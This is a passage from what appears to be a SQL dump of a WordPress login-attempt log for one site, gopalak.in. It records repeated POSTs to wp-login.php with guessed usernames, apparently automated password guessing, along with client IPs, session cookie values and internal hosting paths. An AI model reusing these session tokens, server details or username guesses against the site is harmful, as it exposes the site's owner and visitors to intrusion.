swpm_session=feabb6db1270d2c4dfb15bd1363828ea\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"none\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"129\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"198.98.51.24\";s:14:\"HTTP_X_REAL_IP\";s:12:\"198.98.51.24\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:12:\"198.98.51.24\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"129\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:9:\"wp_lang=e\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746980466.1811221;s:12:\"REQUEST_TIME\";i:1746980466;}}','198.98.51.24',0,'2025-05-11 21:51:07','1970-01-01 00:00:00'),(95510,0,'a:2:{s:8:\"username\";s:1:\"m\";s:6:\"server\";a:39:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:23:\"/wp-login.php?wp_lang=e\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:11:\"HTTP_COOKIE\";s:182:\"_jwp=1; wp_lang=e; _uid=fwAAAWggznee+hm1A2lCAg==; PHPSESSID=6403493c1e5d88cfb814178ba7ed7ae2; wordpress_test_cookie=WP%20Cookie%20check; swpm_session=167109a227f0e988a0d3acd74182a36d\";s:15:\"HTTP_USER_AGENT\";s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"none\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"125\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"198.98.51.24\";s:14:\"HTTP_X_REAL_IP\";s:12:\"198.98.51.24\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:12:\"198.98.51.24\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"125\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:9:\"wp_lang=e\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746980471.9467261;s:12:\"REQUEST_TIME\";i:1746980471;}}','198.98.51.24',0,'2025-05-11 21:51:13','1970-01-01 00:00:00'),(95511,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746981249.859004;s:12:\"REQUEST_TIME\";i:1746981249;}}','13.233.245.36',1,'2025-05-11 22:04:11','2025-05-12 23:29:05'),(95512,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746981249.895627;s:12:\"REQUEST_TIME\";i:1746981249;}}','13.233.245.36',1,'2025-05-11 22:04:11','2025-05-12 23:29:05'),(95513,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746981249.899354;s:12:\"REQUEST_TIME\";i:1746981249;}}','13.233.245.36',1,'2025-05-11 22:04:11','2025-05-12 23:29:05'),(95514,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746981249.894748;s:12:\"REQUEST_TIME\";i:1746981249;}}','13.233.245.36',1,'2025-05-11 22:04:11','2025-05-12 23:29:05'),(95515,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746981249.8608911;s:12:\"REQUEST_TIME\";i:1746981249;}}','13.233.245.36',1,'2025-05-11 22:04:11','2025-05-12 23:29:05'),(95516,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746981593.179456;s:12:\"REQUEST_TIME\";i:1746981593;}}','13.233.245.36',1,'2025-05-11 22:09:55','2025-05-12 23:29:05'),(95517,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746981593.1782129;s:12:\"REQUEST_TIME\";i:1746981593;}}','13.233.245.36',1,'2025-05-11 22:09:56','2025-05-12 23:29:05'),(95518,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746981593.177381;s:12:\"REQUEST_TIME\";i:1746981593;}}','13.233.245.36',1,'2025-05-11 22:09:56','2025-05-12 23:29:05'),(95519,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\